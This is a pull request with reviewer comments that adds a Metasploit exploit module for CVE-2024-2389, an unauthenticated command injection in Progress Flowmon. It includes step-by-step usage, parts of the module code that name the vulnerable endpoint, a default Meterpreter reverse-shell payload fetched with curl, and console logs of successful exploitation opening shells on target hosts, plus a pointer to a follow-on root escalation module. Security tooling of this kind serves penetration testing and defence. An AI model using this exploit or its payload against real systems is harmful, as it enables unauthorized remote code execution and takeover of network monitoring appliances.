### PR TITLE
Add module for Flowmon cmd injection CVE-2024-2389

### PR DESCRIPTION
**Pull request by DaveYesland**
This adds a module for:
CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection

For more details on the vulnerability:  
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/

https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

This application is avaiable in cloud marketplaces:
- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud

## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection`
1. Do: `set RHOSTS <target flowmon>`
1. Do: `set RPORT <port flowmon is running on>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `flowmon` user.
1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges.

### Flowmon 12.2

``` msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options

Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PRIVESC    true             yes       Automatically try privesc to add sudo entry
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.174.209.101  yes       The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to Flowmon
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
                                                  , WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      TkHAXYbQwlH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain space
                                                  s
   LHOST               138.111.211.11   yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run

[*] Started reverse TCP handler on 138.111.211.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.174.209.101:443 can be exploited!
[*] Detected version: 12.02.06
[+] Version 12.02.06 is vulnerable.
[+] The target is vulnerable.
[*] Attempting to execute payload...
[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000

meterpreter > sysinfo
Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: flowmon
```

### CODE REVIEW

File: documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md [hunk 1]
```diff
@@ -0,0 +1,91 @@
...
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `flowmon` user.
+1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges.
+
+## Scenarios
+
+### Flowmon 12.2
+
+``` msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options
```
Comment (adfoster-r7) [inline documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md:30]:
``````suggestion
```
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options
``````

File: modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb [hunk 2]
```diff
@@ -0,0 +1,102 @@
...
+
+    uri = normalize_uri(target_uri.path, 'homepage/auth/login')
+    res = send_request_cgi(
+      'uri' => uri,
+      'method' => 'GET'
+    )
+
+    unless res
+      print_error('Connection failed')
+      return CheckCode::Unknown
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb:81]: You can provide strings here as part of the check codes:

```suggestion
      return Msf::Exploit::CheckCode::Unknown('Connection failed - unable to access auth login')
```

It'd be great to add that to the other lines too :100:

File: modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb [hunk 3]
```diff
@@ -0,0 +1,102 @@
...
+    end
+
+    # Use a regular expression to extract the version number from the response
+    version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb:85]: Not a blocker: As a sanity question; is fingerprinting on `homepage/auth/login` and having `fav.ico?v=....` enough to uniquely identify the application as flowmon - or are there other checks we can add to have a more rigorous check

File: modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb [hunk 4]
```diff
@@ -0,0 +1,102 @@
...
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [['Automatic', {}]],
+        'Privileged' => false,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb:41]: Do we need to specify a default here? 👀

File: modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb [hunk 5]
```diff
@@ -0,0 +1,102 @@
...
+    ])
+  end
+
+  def execute_command(cmd)
+    send_request_cgi(
+      'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),
+      'method' => 'GET',
+      'vars_get' => {
+        'file' => 'x',
+        'lang' => 'x',
```
Comment (jvoisin) [inline modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb:59]: Those values should be randomized

File: modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb (hunk 3 above)
Comment (jheysel-r7) [reply modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb:82]: I've added a check to ensure the following html appears on the login page:
```
<title>Flowmon Web Interface</title>
```

**Review by jheysel-r7 — COMMENTED** [review]
Thanks for the awesome module @DaveYesland.  I pushed up a0597007e4ba0f285e4663e5b907319b12617e78, hope you don't mind. I responded to the outstanding comments on the PR made a couple minor fixes. The PR is looking great and testing was as expected 👍 
```
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > options

Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.2.26     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
                                         sing-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to Flowmon
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      kCCuPRnPS        no        Name to use on remote system when storing payload; cannot contain spaces
                                                  or slashes
   FETCH_SRVHOST       192.168.2.23     no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               192.168.2.23     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.2.23:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.2.26:443 can be exploited!
[*] Detected version: 12.03.02
[+] Version 12.03.02 is vulnerable.
[+] The target is vulnerable.
[*] Attempting to execute payload...
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.26:34294) at 2024-05-23 13:12:55 -0400

meterpreter > getuid
Server username: flowmon
meterpreter > sysinfo
Computer     : localhost.localdomain.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
```

File: modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb [hunk 6]
```diff
@@ -76,27 +75,20 @@ def check
       'method' => 'GET'
     )
 
-    unless res
-      print_error('Connection failed')
-      return CheckCode::Unknown
-    end
+    return CheckCode::Unknown('Connection failed') unless res
+    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_xml_document.xpath('//title').text == 'Flowmon Web Interface'
```
Comment (cdelafuente-r7) [inline modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb:79]: Is the response an HTML page? If so, maybe `#get_html_document` should be used instead. This methods returns a `Nokogiri::HTML` object, which seems to be more adequate here.
```suggestion
    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'
```

Comment (jheysel-r7) [reply modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb]: It is an html document, great catch! That was a copy pasta error on my part.

**Pull request merged**